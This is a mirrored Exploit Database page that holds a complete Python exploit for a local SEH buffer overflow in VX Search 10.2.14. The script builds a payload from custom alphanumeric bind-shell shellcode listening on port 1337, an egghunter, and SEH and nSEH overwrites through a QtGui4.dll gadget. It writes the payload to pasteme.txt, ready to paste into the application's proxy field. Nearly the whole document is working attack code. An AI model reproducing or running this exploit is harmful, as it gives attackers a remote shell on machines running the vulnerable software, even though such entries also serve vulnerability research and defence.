VX Search 10.2.14 – ‘Proxy’ Local Buffer Overflow (SEH)

• Exploit Database
• 89 阅读

• 作者： wetw0rk
  日期： 2017-11-16
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/43156/

• #!/usr/bin/env python
  #
  # Exploit Title : VXSearch v10.2.14 Local SEH Overflow
  # Date: 11/16/2017
  # Exploit Author: wetw0rk
  # Vendor Homepage : http://www.flexense.com/
  # Software link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe
  # Version : 10.2.14
  # Tested on : Windows 7 (x86)
  # Description : VX Search v10.2.14 suffers from a local buffer overflow. The
  # following exploit will generate a bind shell on port 1337. I
  # was unable to get a shell working with msfvenom shellcode so
  # below is a custom alphanumeric bind shell. Greetz rezkon ;)
  #
  # trigger the vulnerability by :
  # Tools -> Advanced options -> Proxy -> *Paste In Proxy Host Name
  #
  
  import struct
  
  shellcode = "w00tw00t"
  shellcode += (
  "\x25\x4a\x4d\x4e\x55"# and eax, 0x554e4d4a
  "\x25\x35\x32\x31\x2a"# and eax, 0x2a313235
  "\x2d\x6a\x35\x35\x35"# sub eax, 0x3535356a
  "\x2d\x65\x6a\x6a\x65"# sub eax, 0x656a6a65
  "\x2d\x61\x64\x4d\x65"# sub eax, 0x654d6461
  "\x50"# push eax
  "\x5c"# pop esp
  )
  shellcode += (
  "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4f\x4f\x4f\x4f"
  "\x2d\x4f\x30\x4f\x68\x2d\x62\x2d\x62\x72\x50\x25\x4a\x4d\x4e"
  "\x55\x25\x35\x32\x31\x2a\x2d\x76\x57\x57\x63\x2d\x77\x36\x39"
  "\x32\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x54"
  "\x54\x54\x2d\x25\x54\x7a\x2d\x2d\x25\x52\x76\x36\x50\x25\x4a"
  "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49\x35\x49\x49\x2d\x49"
  "\x25\x49\x69\x2d\x64\x25\x72\x6c\x50\x25\x4a\x4d\x4e\x55\x25"
  "\x35\x32\x31\x2a\x2d\x70\x33\x33\x25\x2d\x70\x25\x70\x25\x2d"
  "\x4b\x6a\x56\x39\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
  "\x2d\x79\x55\x75\x32\x2d\x79\x75\x75\x55\x2d\x79\x77\x77\x78"
  "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x4a\x4a"
  "\x25\x2d\x39\x5f\x4d\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
  "\x31\x2a\x2d\x4b\x57\x4b\x57\x2d\x70\x76\x4b\x79\x2d\x70\x76"
  "\x78\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49"
  "\x49\x49\x49\x2d\x49\x4e\x64\x49\x2d\x78\x25\x78\x25\x2d\x6f"
  "\x25\x7a\x48\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
  "\x58\x58\x38\x58\x2d\x58\x30\x32\x58\x2d\x51\x46\x2d\x47\x50"
  "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x5f\x52\x5f\x5f"
  "\x2d\x5f\x25\x25\x35\x2d\x62\x39\x25\x25\x50\x25\x4a\x4d\x4e"
  "\x55\x25\x35\x32\x31\x2a\x2d\x4a\x4a\x4a\x4a\x2d\x4a\x4a\x4a"
  "\x4a\x2d\x79\x39\x4a\x79\x2d\x6d\x32\x4b\x68\x50\x25\x4a\x4d"
  "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x30\x71\x30\x2d\x30\x25"
  "\x71\x30\x2d\x38\x31\x51\x5f\x50\x25\x4a\x4d\x4e\x55\x25\x35"
  "\x32\x31\x2a\x2d\x32\x32\x32\x32\x2d\x78\x77\x7a\x77\x50\x25"
  "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x62\x62\x62\x62\x2d"
  "\x48\x57\x47\x4f\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
  "\x2d\x76\x76\x4f\x4f\x2d\x36\x39\x5a\x5a\x50\x25\x4a\x4d\x4e"
  "\x55\x25\x35\x32\x31\x2a\x2d\x61\x61\x61\x61\x2d\x4a\x61\x4a"
  "\x25\x2d\x45\x77\x53\x35\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
  "\x31\x2a\x2d\x63\x63\x63\x63\x2d\x39\x63\x63\x2d\x2d\x32\x63"
  "\x7a\x25\x2d\x31\x49\x7a\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35"
  "\x32\x31\x2a\x2d\x72\x79\x79\x79\x2d\x25\x30\x25\x30\x2d\x25"
  "\x32\x25\x55\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
  "\x58\x58\x41\x58\x2d\x58\x58\x25\x77\x2d\x6e\x51\x32\x69\x50"
  "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x48\x77\x38\x48"
  "\x2d\x4e\x76\x6e\x61\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
  "\x2a\x2d\x41\x41\x6e\x6e\x2d\x31\x31\x30\x6e\x2d\x37\x36\x30"
  "\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x38\x38"
  "\x38\x38\x2d\x38\x79\x38\x25\x2d\x38\x79\x38\x25\x2d\x58\x4c"
  "\x73\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x61"
  "\x52\x61\x52\x2d\x37\x4a\x31\x49\x50\x25\x4a\x4d\x4e\x55\x25"
  "\x35\x32\x31\x2a\x2d\x4d\x47\x4d\x4d\x2d\x30\x25\x4d\x6b\x2d"
  "\x36\x32\x66\x71\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
  "\x2d\x36\x43\x43\x6c\x2d\x33\x54\x47\x25\x50\x25\x4a\x4d\x4e"
  "\x55\x25\x35\x32\x31\x2a\x2d\x4c\x4c\x4c\x4c\x2d\x6e\x4c\x6e"
  "\x36\x2d\x65\x67\x6f\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
  "\x31\x2a\x2d\x25\x25\x4b\x4b\x2d\x25\x25\x6f\x4b\x2d\x4e\x41"
  "\x59\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41"
  "\x41\x41\x41\x2d\x52\x52\x78\x41\x2d\x6e\x6c\x70\x25\x50\x25"
  "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x6c\x30\x30\x2d"
  "\x30\x6c\x6c\x30\x2d\x38\x70\x79\x66\x50\x25\x4a\x4d\x4e\x55"
  "\x25\x35\x32\x31\x2a\x2d\x42\x70\x70\x45\x2d\x32\x45\x70\x31"
  "\x2d\x25\x4b\x49\x31\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
  "\x2a\x2d\x25\x50\x50\x50\x2d\x25\x7a\x72\x25\x2d\x4e\x73\x61"
  "\x52\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x77"
  "\x74\x74\x2d\x61\x78\x35\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35"
  "\x32\x31\x2a\x2d\x30\x30\x30\x30\x2d\x30\x30\x59\x30\x2d\x30"
  "\x30\x74\x51\x2d\x6b\x36\x79\x67\x50\x25\x4a\x4d\x4e\x55\x25"
  "\x35\x32\x31\x2a\x2d\x75\x38\x43\x43\x2d\x7a\x31\x43\x43\x2d"
  "\x7a\x2d\x77\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
  "\x2d\x59\x59\x59\x59\x2d\x59\x59\x59\x59\x2d\x6f\x6c\x4d\x77"
  "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45"
  "\x45\x2d\x34\x2d\x76\x45\x2d\x37\x25\x5a\x65\x50\x25\x4a\x4d"
  "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x34\x34\x34\x34\x2d\x62\x34"
  "\x34\x34\x2d\x6d\x56\x47\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35"
  "\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x76\x2d\x2d\x76\x2d\x55"
  "\x4c\x55\x7a\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
  "\x77\x77\x77\x30\x2d\x47\x47\x79\x30\x2d\x42\x42\x39\x34\x50"
  "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x75\x36\x51"
  "\x2d\x42\x61\x49\x43\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
  "\x2a\x2d\x56\x56\x31\x56\x2d\x31\x79\x31\x25\x2d\x50\x6c\x48"
  "\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x72\x72"
  "\x72\x72\x2d\x72\x25\x38\x38\x2d\x38\x25\x25\x25\x2d\x54\x41"
  "\x30\x30\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47"
  "\x47\x47\x76\x2d\x47\x47\x76\x76\x2d\x6b\x72\x6c\x5a\x50\x25"
  "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x71\x25\x71\x2d"
  "\x73\x42\x63\x68\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
  "\x2d\x48\x55\x51\x51\x2d\x45\x78\x4f\x5a\x50\x25\x4a\x4d\x4e"
  "\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45\x32\x2d\x45\x45\x25"
  "\x31\x2d\x76\x75\x2d\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
  "\x31\x2a\x2d\x6e\x4f\x6d\x6e\x2d\x35\x48\x5f\x5f\x50\x25\x4a"
  "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x71"
  "\x2d\x2d\x71\x2d\x71\x2d\x4a\x71\x2d\x66\x65\x70\x62\x50\x25"
  "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x30\x56\x30\x2d"
  "\x56\x38\x25\x30\x2d\x74\x37\x25\x45\x50\x25\x4a\x4d\x4e\x55"
  "\x25\x35\x32\x31\x2a\x2d\x32\x32\x32\x77\x2d\x32\x32\x32\x32"
  "\x2d\x43\x41\x4a\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
  "\x2a\x2d\x63\x63\x63\x30\x2d\x79\x41\x41\x6e\x50\x25\x4a\x4d"
  "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4b\x4b\x4b\x4b\x2d\x4b\x4b"
  "\x25\x31\x2d\x4b\x71\x25\x32\x2d\x4f\x6e\x25\x2d\x50\x25\x4a"
  "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x37\x37\x37\x37\x2d\x6d"
  "\x37\x6d\x37\x2d\x6d\x37\x6d\x37\x2d\x64\x55\x63\x58\x50\x25"
  "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x44\x6c\x6c\x6c\x2d"
  "\x34\x44\x44\x6c\x2d\x30\x33\x4e\x54\x50\x25\x4a\x4d\x4e\x55"
  "\x25\x35\x32\x31\x2a\x2d\x2d\x7a\x43\x2d\x2d\x48\x79\x71\x47"
  "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x41\x41"
  "\x41\x2d\x41\x46\x71\x25\x2d\x5a\x77\x7a\x32\x50\x25\x4a\x4d"
  "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47\x47\x47\x47\x2d\x47\x6e"
  "\x47\x6e\x2d\x47\x78\x6e\x78\x2d\x47\x79\x77\x79\x50\x25\x4a"
  "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x74\x38\x69\x38\x2d\x51"
  "\x4a\x72\x52\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
  "\x79\x79\x30\x79\x2d\x4d\x4d\x2d\x4d\x2d\x44\x35\x25\x41\x50"
  "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x6f\x6f\x6f\x31"
  "\x2d\x74\x25\x6f\x33\x2d\x56\x32\x41\x25\x50\x25\x4a\x4d\x4e"
  "\x55\x25\x35\x32\x31\x2a\x2d\x54\x54\x54\x54\x2d\x72\x72\x54"
  "\x54\x2d\x79\x69\x49\x56\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
  "\x31\x2a\x2d\x70\x70\x70\x70\x2d\x70\x25\x5a\x70\x2d\x4a\x38"
  "\x36\x72\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x6d"
  "\x6d\x6d\x6d\x2d\x6d\x6d\x6d\x46\x2d\x48\x76\x74\x25\x2d\x53"
  "\x7a\x25\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
  "\x7a\x7a\x7a\x43\x2d\x49\x43\x25\x43\x2d\x25\x5f\x25\x30\x50"
  "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x51\x51\x51\x51"
  "\x2d\x51\x51\x51\x70\x2d\x38\x51\x61\x7a\x2d\x25\x39\x70\x7a"
  "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x37\x44\x37"
  "\x6c\x2d\x78\x30\x6f\x73\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
  "\x31\x2a\x2d\x44\x25\x25\x44\x2d\x76\x25\x76\x76\x2d\x63\x6c"
  "\x63\x74\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x42"
  "\x47\x74\x4e\x2d\x33\x6c\x7a\x39\x50\x25\x4a\x4d\x4e\x55\x25"
  "\x35\x32\x31\x2a\x2d\x7a\x30\x66\x7a\x2d\x76\x44\x4f\x49\x50"
  "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x41\x41\x41"
  "\x2d\x6d\x67\x33\x6c\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
  "\x2a\x2d\x51\x51\x51\x51\x2d\x65\x71\x51\x51\x2d\x49\x76\x7a"
  "\x6a\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x4a"
  "\x42\x35\x2d\x35\x7a\x7a\x42\x2d\x76\x7a\x73\x7a\x50\x25\x4a"
  "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x25\x35\x35\x2d\x35"
  "\x25\x76\x35\x2d\x35\x39\x52\x69\x50\x25\x4a\x4d\x4e\x55\x25"
  "\x35\x32\x31\x2a\x2d\x74\x74\x74\x5a\x2d\x36\x5a\x74\x30\x2d"
  "\x25\x32\x6a\x38\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
  "\x2d\x75\x75\x43\x75\x2d\x43\x6f\x41\x30\x2d\x39\x64\x30\x34"
  "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x74\x2d\x58"
  "\x6e\x2d\x78\x47\x35\x69\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
  "\x31\x2a\x2d\x66\x79\x4f\x66\x2d\x48\x7a\x25\x47\x50\x25\x4a"
  "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x42\x42\x7a\x42\x2d\x33"
  "\x6d\x55\x32\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
  "\x61\x61\x61\x41\x2d\x61\x39\x64\x25\x2d\x59\x33\x7a\x34\x50"
  "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x66\x66\x66\x66"
  "\x2d\x41\x41\x66\x66\x2d\x25\x33\x66\x66\x2d\x34\x25\x6d\x43"
  "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49\x49\x32"
  "\x49\x2d\x49\x59\x25\x49\x2d\x72\x74\x25\x6d\x50"
  )
  shellcode += "A" * 4000
  
  egghunter = "A" * 40# serve as NOP's
  egghunter += (
  "\x25\x4a\x4d\x4e\x55"# and eax, 0x554e4d4a
  "\x25\x35\x32\x31\x2a"# and eax, 0x2a313235
  "\x2d\x58\x58\x58\x58"# sub eax, 0x58585858
  "\x2d\x58\x58\x67\x58"# sub eax, 0x58675858
  "\x2d\x5a\x4f\x2d\x4f"# sub eax, 0x4f2d4f5a
  "\x50"# push eax
  "\x5c"# pop esp
  )
  egghunter += (
  "%JMNU%521*-%OOO-%OOO-AzayP%JMNU%521*-r-Pr-"
  "r%Pr-m7ukP%JMNU%521*-wwww-wwwA-wwA--k%FBP%"
  "JMNU%521*-Jk1J-Tk1T-sp%1P%JMNU%521*-WWM6-6"
  "W30-7L%%P%JMNU%521*-WNWW-W%d%-P4wTP%JMNU%5"
  "21*-wt7G-zIvNP%JMNU%521*-1%uu-1%u1-84KYP"
  )
  
  offset= "A" * (23920-len(shellcode))# offset to nSEH
  nSEH= "\x74\x26\x75\x26"# JE/JNZ + 38 (decimal) 
  SEH = struct.pack('<L', 0x65263067) # POP,POP,RET (QtGui4.dll [asciiprint])
  trigger = "A" * (40000 - (
  len(offset) +
  len(nSEH) +
  len(SEH)+
  len(egghunter)+
  len(shellcode)
  )
  )
  
  payload = offset + shellcode + nSEH + SEH + egghunter + trigger
  print "[*] payload written to pasteme.txt"
  fd = open("pasteme.txt", 'w')
  fd.write(payload)
  fd.close()
  

  PowerShell

  Copy